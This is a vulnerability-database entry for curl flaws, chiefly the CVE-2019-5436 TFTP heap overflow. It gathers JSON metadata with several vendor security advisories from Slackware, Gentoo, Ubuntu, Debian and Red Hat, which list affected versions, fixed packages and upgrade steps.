        "db": "PACKETSTORM",
        "id": "174080"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202208-4523"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-35252"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-428403",
        "ident": null
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-35252",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "168239",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "170303",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "170697",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "170698",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "176746",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "172378",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "172587",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "172195",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "174080",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202208-4523",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2022-35252",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2022-09-23T00:00:00",
        "db": "VULHUB",
        "id": "VHN-428403",
        "ident": null
      },
      {
        "date": "2022-09-02T15:21:41",
        "db": "PACKETSTORM",
        "id": "168239",
        "ident": null
      },
      {
        "date": "2022-12-19T13:48:31",
        "db": "PACKETSTORM",
        "id": "170303",
        "ident": null
      },
      {
        "date": "2023-01-24T16:41:07",
        "db": "PACKETSTORM",
        "id": "170697",
        "ident": null
      },
      {
        "date": "2023-01-24T16:41:28",
        "db": "PACKETSTORM",
        "id": "170698",
        "ident": null
      },
      {
        "date": "2024-01-26T15:24:15",
        "db": "PACKETSTORM",
        "id": "176746",
        "ident": null
      },
      {
        "date": "2023-05-16T17:09:54",
        "db": "PACKETSTORM",
        "id": "172378",
        "ident": null
      },
      {
        "date": "2023-05-26T14:34:05",
        "db": "PACKETSTORM",
        "id": "172587",
        "ident": null
      },
      {
        "date": "2023-05-09T15:14:58",
        "db": "PACKETSTORM",
        "id": "172195",
        "ident": null
      },
      {
        "date": "2023-08-09T15:56:32",
        "db": "PACKETSTORM",
        "id": "174080",
        "ident": null
      },
      {
        "date": "2022-08-31T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202208-4523",
        "ident": null
      },
      {
        "date": "2022-09-23T14:15:12.323000",
        "db": "NVD",
        "id": "CVE-2022-35252",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2023-03-01T00:00:00",
        "db": "VULHUB",
        "id": "VHN-428403",
        "ident": null
      },
      {
        "date": "2023-06-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202208-4523",
        "ident": null
      },
      {
        "date": "2025-05-05T17:18:16.463000",
        "db": "NVD",
        "id": "CVE-2022-35252",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202208-4523"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "_id": null,
    "data": "curl Security hole",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202208-4523"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "_id": null,
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202208-4523"
      }
    ],
    "trust": 0.6
  }
}

VAR-201905-0095

Vulnerability from variot - Updated: 2026-03-09 22:42

A heap buffer overflow in the TFTP receiving code allows for DoS or arbitrary code execution in libcurl versions 7.19.4 through 7.64.1. curl/libcURL is prone a heap-based buffer-overflow vulnerability. An attacker can exploit these issues to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. libcurl versions 7.19.4 through 7.64.1 are vulnerable. Haxx libcurl is an open source client URL transfer library from Haxx, Sweden. The product supports protocols such as FTP, SFTP, TFTP and HTTP. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations.

Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/curl-7.65.0-i586-1_slack14.2.txz: Upgraded. This release fixes the following security issues: Integer overflows in curl_url_set tftp: use the current blksize for recvfrom() For more information, see: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5435 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5436 ( Security fix ) +--------------------------+

Where to find the new packages: +-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/curl-7.65.0-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/curl-7.65.0-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/curl-7.65.0-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/curl-7.65.0-x86_64-1_slack14.1.txz

Updated package for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/curl-7.65.0-i586-1_slack14.2.txz

Updated package for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/curl-7.65.0-x86_64-1_slack14.2.txz

Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/curl-7.65.0-i586-1.txz

Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/curl-7.65.0-x86_64-1.txz

MD5 signatures: +-------------+

Slackware 14.0 package: 6e09fa0f3bf3899629f78338886b8166 curl-7.65.0-i486-1_slack14.0.txz

Slackware x86_64 14.0 package: 55613986ed81a77a573976161b5b76fa curl-7.65.0-x86_64-1_slack14.0.txz

Slackware 14.1 package: 4317a7f249ca9dc8fdd9c4470335c140 curl-7.65.0-i486-1_slack14.1.txz

Slackware x86_64 14.1 package: 1a0cfbced24644f121dcd3140c378d85 curl-7.65.0-x86_64-1_slack14.1.txz

Slackware 14.2 package: 0112a5878893a036364b3792bb62de6c curl-7.65.0-i586-1_slack14.2.txz

Slackware x86_64 14.2 package: 794f036ca4ae31aaad11bdb3e4f1b7d9 curl-7.65.0-x86_64-1_slack14.2.txz

Slackware -current package: 82112f6caf0dc1d94340b4cf6a3eb001 n/curl-7.65.0-i586-1.txz

Slackware x86_64 -current package: df9c4d1a59fe2f191fd20035c0fcff29 n/curl-7.65.0-x86_64-1.txz

Installation instructions: +------------------------+

Upgrade the package as root:

upgradepkg curl-7.65.0-i586-1_slack14.2.txz

+-----+

Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com

+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202003-29

                                       https://security.gentoo.org/

Severity: Normal Title: cURL: Multiple vulnerabilities Date: March 15, 2020 Bugs: #686050, #694020 ID: 202003-29

Synopsis

Multiple vulnerabilities have been found in cURL, the worst of which may lead to arbitrary code execution.

Background

A command line tool and library for transferring data with URLs.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 net-misc/curl < 7.66.0 >= 7.66.0

Description

Multiple vulnerabilities have been discovered in cURL. Please review the CVE identifiers referenced below for details.

Workaround

There is no known workaround at this time.

Resolution

All cURL users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/curl-7.66.0"

References

[ 1 ] CVE-2019-5435 https://nvd.nist.gov/vuln/detail/CVE-2019-5435 [ 2 ] CVE-2019-5436 https://nvd.nist.gov/vuln/detail/CVE-2019-5436 [ 3 ] CVE-2019-5481 https://nvd.nist.gov/vuln/detail/CVE-2019-5481 [ 4 ] CVE-2019-5482 https://nvd.nist.gov/vuln/detail/CVE-2019-5482

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/202003-29

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5 . ========================================================================== Ubuntu Security Notice USN-3993-1 May 22, 2019

curl vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 19.04
Ubuntu 18.10
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in curl. This issue only affected Ubuntu 19.04. (CVE-2019-5435)

It was discovered that curl incorrectly handled memory when receiving data from a TFTP server. (CVE-2019-5436)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 19.04: curl 7.64.0-2ubuntu1.1 libcurl3-gnutls 7.64.0-2ubuntu1.1 libcurl3-nss 7.64.0-2ubuntu1.1 libcurl4 7.64.0-2ubuntu1.1

Ubuntu 18.10: curl 7.61.0-1ubuntu2.4 libcurl3-gnutls 7.61.0-1ubuntu2.4 libcurl3-nss 7.61.0-1ubuntu2.4 libcurl4 7.61.0-1ubuntu2.4

Ubuntu 18.04 LTS: curl 7.58.0-2ubuntu3.7 libcurl3-gnutls 7.58.0-2ubuntu3.7 libcurl3-nss 7.58.0-2ubuntu3.7 libcurl4 7.58.0-2ubuntu3.7

Ubuntu 16.04 LTS: curl 7.47.0-1ubuntu2.13 libcurl3 7.47.0-1ubuntu2.13 libcurl3-gnutls 7.47.0-1ubuntu2.13 libcurl3-nss 7.47.0-1ubuntu2.13

In general, a standard system update will make all the necessary changes. 7.7) - ppc64, ppc64le, s390x, x86_64

This only affects the oldstable distribution (stretch).

CVE-2019-5481

Thomas Vegas discovered a double-free in the FTP-KRB code, triggered
by a malicious server sending a very large data block.

For the oldstable distribution (stretch), these problems have been fixed in version 7.52.1-5+deb9u10.

For the stable distribution (buster), these problems have been fixed in version 7.64.0-4+deb10u1.

We recommend that you upgrade your curl packages.

For the detailed security status of curl please refer to its security tracker page at: https://security-tracker.debian.org/tracker/curl

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEBsId305pBx+F583DbwzL4CFiRygFAl5UJtgACgkQbwzL4CFi RyiozQ//TWmlmQt7fsskJtczrkjToirTdbgmzBeRI6PL2HXEZYY7WtdQzXDHqTb5 eQwrIrKsSrS30QneeeGHPEABhfUBCIQRiXocd5enAdQbqPchTIVl92YrZhHZqjbU aP0q02QZrhn6nidzA+c3sU7ClW0YERVXOuVZAhQDnw0y1Iai5yVuQvIOhDYIEOdU G86svqzr4UAMdZPFP0N1avyHmonNB1/UC//l/g2s7q2ki7NOBCMfg2QV5+/6Ip0F tR8mgpukO7l+M0Jhb3SeCaGaRvbHDlkFIyGXKbDyffs14ceRykm/fhxB2bc8dSK7 KLGjRLXJyHKCCoWzafHk13aNGu0jVqaRrCcyezhI8fnr9V/enDbnzLeEWGGL8H3e qVTyY+ykypinWeIRv+5VQtgrAhEJ6ZCiGCmbRyhwP0s8Yu5MlOJeS1L4GnBUbYuH ZhB/DWtqFlh/Rgjs6XWr/CwzxFAps+wbKjY8l8/C18308J0bKq1sx4XWSEmXrMMj KbdVNKEjvA3n8HTa4CC+CgVA7723ysCERbKnTLKTu8rgPA9QDMyyxNpenVeB24DW G9rrnokVK0c56EeDlAOCB3gSA4XoDt3k+xP4vfaBcyzGj/mkEsOeAT6+lzqPbO30 KqjBEQgVzb5nvKpPhJF8f71DXegfFvDL2ti5G4wkfRME4ytM6Wg=QC2b -----END PGP SIGNATURE----- . Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

Security Fix(es):

golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic (CVE-2020-9283)
SSL/TLS: CBC padding timing attack (lucky-13) (CVE-2013-0169)
grafana: XSS vulnerability via a column style on the "Dashboard > Table Panel" screen (CVE-2018-18624)
js-jquery: prototype pollution in object's prototype leading to denial of service or remote code execution or property injection (CVE-2019-11358)
npm-serialize-javascript: XSS via unsafe characters in serialized regular expressions (CVE-2019-16769)
kibana: Prototype pollution in TSVB could result in arbitrary code execution (ESA-2020-06) (CVE-2020-7013)
nodejs-minimist: prototype pollution allows adding or modifying properties of Object.prototype using a constructor or proto payload (CVE-2020-7598)
npmjs-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser (CVE-2020-7662)
nodejs-lodash: prototype pollution in zipObjectDeep function (CVE-2020-8203)
jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method (CVE-2020-11022)
jQuery: passing HTML containing elements to manipulation methods could result in untrusted code execution (CVE-2020-11023)
grafana: stored XSS (CVE-2020-11110)
grafana: XSS annotation popup vulnerability (CVE-2020-12052)
grafana: XSS via column.title or cellLinkTooltip (CVE-2020-12245)
nodejs-elliptic: improper encoding checks allows a certain degree of signature malleability in ECDSA signatures (CVE-2020-13822)
golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040)
nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function (CVE-2020-15366)
openshift/console: text injection on error page via crafted url (CVE-2020-10715)
kibana: X-Frame-Option not set by default might lead to clickjacking (CVE-2020-10743)
openshift: restricted SCC allows pods to craft custom network packets (CVE-2020-14336)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Solution:

For OpenShift Container Platform 4.6 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel ease-notes.html

Details on how to access this content are available at https://docs.openshift.com/container-platform/4.6/updating/updating-cluster - -cli.html. Bugs fixed (https://bugzilla.redhat.com/):

907589 - CVE-2013-0169 SSL/TLS: CBC padding timing attack (lucky-13) 1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection 1767665 - CVE-2020-10715 openshift/console: text injection on error page via crafted url 1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic 1813344 - CVE-2020-7598 nodejs-minimist: prototype pollution allows adding or modifying properties of Object.prototype using a constructor or proto payload 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1834550 - CVE-2020-10743 kibana: X-Frame-Option not set by default might lead to clickjacking 1845982 - CVE-2020-7662 npmjs-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser 1848089 - CVE-2020-12052 grafana: XSS annotation popup vulnerability 1848092 - CVE-2019-16769 npm-serialize-javascript: XSS via unsafe characters in serialized regular expressions 1848643 - CVE-2020-12245 grafana: XSS via column.title or cellLinkTooltip 1848647 - CVE-2020-13822 nodejs-elliptic: improper encoding checks allows a certain degree of signature malleability in ECDSA signatures 1849044 - CVE-2020-7013 kibana: Prototype pollution in TSVB could result in arbitrary code execution (ESA-2020-06) 1850004 - CVE-2020-11023 jquery: Passing HTML containing elements to manipulation methods could result in untrusted code execution 1850572 - CVE-2018-18624 grafana: XSS vulnerability via a column style on the "Dashboard > Table Panel" screen 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash 1857412 - CVE-2020-8203 nodejs-lodash: prototype pollution in zipObjectDeep function 1857977 - CVE-2020-15366 nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function 1858981 - CVE-2020-14336 openshift: restricted SCC allows pods to craft custom network packets 1861044 - CVE-2020-11110 grafana: stored XSS 1874671 - CVE-2020-14336 ose-machine-config-operator-container: openshift: restricted SCC allows pods to craft custom network packets [openshift-4]

8) - aarch64, ppc64le, s390x, x86_64
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Low: curl security and bug fix update Advisory ID: RHSA-2020:1020-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2020:1020 Issue date: 2020-03-31 CVE Names: CVE-2019-5436 =====================================================================

Summary:

An update for curl is now available for Red Hat Enterprise Linux 7.

Relevant releases/architectures:

Description:

The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.

Security Fix(es):

curl: TFTP receive heap buffer overflow in tftp_receive_packet() function (CVE-2019-5436)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.8 Release Notes linked from the References section.

Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

Bugs fixed (https://bugzilla.redhat.com/):

1710620 - CVE-2019-5436 curl: TFTP receive heap buffer overflow in tftp_receive_packet() function 1754736 - curl does not send Authorization header when receiving WWW-Authenticate header twice 1769307 - curl fails while attempting to POST a char device

Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: curl-7.29.0-57.el7.src.rpm

x86_64: curl-7.29.0-57.el7.x86_64.rpm curl-debuginfo-7.29.0-57.el7.i686.rpm curl-debuginfo-7.29.0-57.el7.x86_64.rpm libcurl-7.29.0-57.el7.i686.rpm libcurl-7.29.0-57.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64: curl-debuginfo-7.29.0-57.el7.i686.rpm curl-debuginfo-7.29.0-57.el7.x86_64.rpm libcurl-devel-7.29.0-57.el7.i686.rpm libcurl-devel-7.29.0-57.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: curl-7.29.0-57.el7.src.rpm

x86_64: curl-7.29.0-57.el7.x86_64.rpm curl-debuginfo-7.29.0-57.el7.i686.rpm curl-debuginfo-7.29.0-57.el7.x86_64.rpm libcurl-7.29.0-57.el7.i686.rpm libcurl-7.29.0-57.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64: curl-debuginfo-7.29.0-57.el7.i686.rpm curl-debuginfo-7.29.0-57.el7.x86_64.rpm libcurl-devel-7.29.0-57.el7.i686.rpm libcurl-devel-7.29.0-57.el7.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: curl-7.29.0-57.el7.src.rpm

ppc64: curl-7.29.0-57.el7.ppc64.rpm curl-debuginfo-7.29.0-57.el7.ppc.rpm curl-debuginfo-7.29.0-57.el7.ppc64.rpm libcurl-7.29.0-57.el7.ppc.rpm libcurl-7.29.0-57.el7.ppc64.rpm libcurl-devel-7.29.0-57.el7.ppc.rpm libcurl-devel-7.29.0-57.el7.ppc64.rpm

ppc64le: curl-7.29.0-57.el7.ppc64le.rpm curl-debuginfo-7.29.0-57.el7.ppc64le.rpm libcurl-7.29.0-57.el7.ppc64le.rpm libcurl-devel-7.29.0-57.el7.ppc64le.rpm

s390x: curl-7.29.0-57.el7.s390x.rpm curl-debuginfo-7.29.0-57.el7.s390.rpm curl-debuginfo-7.29.0-57.el7.s390x.rpm libcurl-7.29.0-57.el7.s390.rpm libcurl-7.29.0-57.el7.s390x.rpm libcurl-devel-7.29.0-57.el7.s390.rpm libcurl-devel-7.29.0-57.el7.s390x.rpm

x86_64: curl-7.29.0-57.el7.x86_64.rpm curl-debuginfo-7.29.0-57.el7.i686.rpm curl-debuginfo-7.29.0-57.el7.x86_64.rpm libcurl-7.29.0-57.el7.i686.rpm libcurl-7.29.0-57.el7.x86_64.rpm libcurl-devel-7.29.0-57.el7.i686.rpm libcurl-devel-7.29.0-57.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: curl-7.29.0-57.el7.src.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2019-5436 https://access.redhat.com/security/updates/classification/#low https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.8_release_notes/index

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iQIVAwUBXoObWtzjgjWX9erEAQiZbxAAqKGZZqZXMjb1Ia8ST1HZTC8mBxlxQM9Z qwT3r0czzMc2PaMlmMbvBPr7JLybKl9bxb8ufMhCAQwvOYsIZ6mLlV+dwLVnpDJr u+I9HhOBjsJgbzspOl8XuyRyylcOXiZmDbuU5JarhGvrMgApHujgzxMwXDedApPP MvtbhMHNOiTrYXhMy6IrTkPoFdPaziNWLAw1TTbfMSsF2C9CUjXCpmRpv+ttq85q 9Ms3wbGuS2tDm9/6grtarY3SxeSoaMg0VR3YJQ4J7jIXoeeHxQSs0K1mBVekEZ9r JcqgynjNqEQP1dcfzOxorRcXD7i2NFC1WLGdAM16KlETiN3Fpcb4nVF+0phU3ea+ hJsKwKEAb6CX+qLi/uITr6m0xYy323QTNCvOHX/xtf6EnpJhq1UsltBOzm/KjL1T N0ClNjEs7/57TEIwE9u3LhDuPfQfdkewRv2QEqLdpNw5JqT8p+dxlrJNzCTkbFPc bgmHZdvfJ5blQweL/ejCE5zmr9jKYbhqyrdBn7sxKj1gn6R9ZHcX14pljDbLAjp/ cBWx9zscU82xyh49QAl8VHabiHpOU9c7SaUz+9G3WzZboaJNUoBrPTPvsXg1nGW7 0f3qjx/Y3/MRR8qCNL7VtNA+8QCGryMU+Gs5cxNnWmtfW0i5kpHCU7cxk/+ig2JZ M95S58Xnb8U= =UHVC -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201905-0095",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "42.3"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "model": "mysql server",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.7.28"
      },
      {
        "model": "mysql server",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.0.17"
      },
      {
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "libcurl",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.64.1"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.0"
      },
      {
        "model": "enterprise manager ops center",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "12.4.0"
      },
      {
        "model": "traffix signaling delivery controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "5.1.0"
      },
      {
        "model": "mysql server",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.7.27"
      },
      {
        "model": "oss support tools",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "20.0"
      },
      {
        "model": "libcurl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.19.4"
      },
      {
        "model": "enterprise manager ops center",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "12.3.3"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "29"
      },
      {
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.1"
      },
      {
        "model": "traffix signaling delivery controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "5.0.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "19.04"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "18.10"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "18.04"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "16.04"
      },
      {
        "model": "linux esm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.04"
      },
      {
        "model": "linux esm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "software collections for rhel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.64.1"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.64"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.63"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.62"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.61.1"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.61"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.60"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.59"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.58"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.57"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.56.1"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.56"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.55.1"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.54.1"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.54"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.53.1"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.53"
      },
      {
        "model": "libcurl",
